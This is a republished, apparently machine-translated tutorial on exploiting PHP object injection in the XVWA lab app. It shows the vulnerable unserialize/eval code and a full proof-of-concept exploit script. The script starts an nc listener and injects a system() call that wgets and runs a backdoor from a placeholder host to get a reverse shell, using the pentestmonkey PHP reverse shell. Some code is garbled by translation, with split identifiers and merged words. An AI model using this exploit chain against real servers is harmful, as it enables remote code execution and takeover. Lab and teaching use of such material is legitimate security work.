PHP serialization/object Injection Vulnerability

Source: Internet
Author: User

PHP serialization/object Injection Vulnerability


This article is a short story about PHP serialization/object injection vulnerability analysis. It describes how to obtain the remote shell of a host. If you want to test this vulnerability on your own, you can use XVWA and Kevgir. The first step of vulnerability exploitation is to test whether PHP serialization exists in the target application. To assist in the test, we use the Burpsuite SuperSerial plug-in, here. It passively detects the existence of PHP and Java serialization.
Analysis
We have detected that PHP serialization is used in the application, so we can start to check whether the application code contains the Remote Code Execution Vulnerability. Note that serialized objects are obtained from the parameter "r:

$ Var1 = unserialize ($ _ REQUEST ['R']);
Then perform deserialization and eval:
Eval ($ this-> inject );
Next, execute:
Echo "". $ var1 [0]. "-". $ var1 [1];
With this, if we bypass the PHP serialization object of the parameter r, we can get the code execution vulnerability!
 

class PHPObjectInjection{       public $inject;        function __construct(){        }        function __wakeup(){           if(isset($this->inject)){                eval($this->inject);           }       }    }//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}   if(isset($_REQUEST['r'])){         $var1=unserialize($_REQUEST['r']);              if(is_array($var1)){           echo "".$var1[0]." - ".$var1[1];       }   }else{       echo "parameter is missing";    }? >

Vulnerability Exploitation
To exploit this vulnerability, we created a simple PHP script to automatically generate PHP serialization payload and run the command we wanted on the target remote host. Then, I created a general PHP bounce shell, as shown below:
Http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: You need to upload this file to the web server, modify the local ip address and port in the reverse shell script, and the following code:
 

 /*PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.comA simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access.Shouts to @jstnkndy @yappare for theassist!NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured*/print"==============================================================================\r\n";print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";print"==============================================================================\r\n";print "[+] Generating serializedpayload...[OK]\r\n";print "[+] Launching reverselistener...[OK]\r\n";system('gnome-terminal -x sh -c \'nc -lvvp1234\'');class PHPObjectInjection{   //CHANGE URL/FILENAME TO MATCH YOUR SETUP  public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";} $url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER$url = $url . urlencode(serialize(newPHPObjectInjection));print "[+] Sendingexploit...[OK]\r\n";print "[+] Dropping down tointeractive shell...[OK]\r\n";print"==============================================================================\r\n";$response =file_get_contents("$url"); ? >Demo

Now that our script is ready, we can execute it to obtain the reverse shell on the remote host for remote command execution!
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.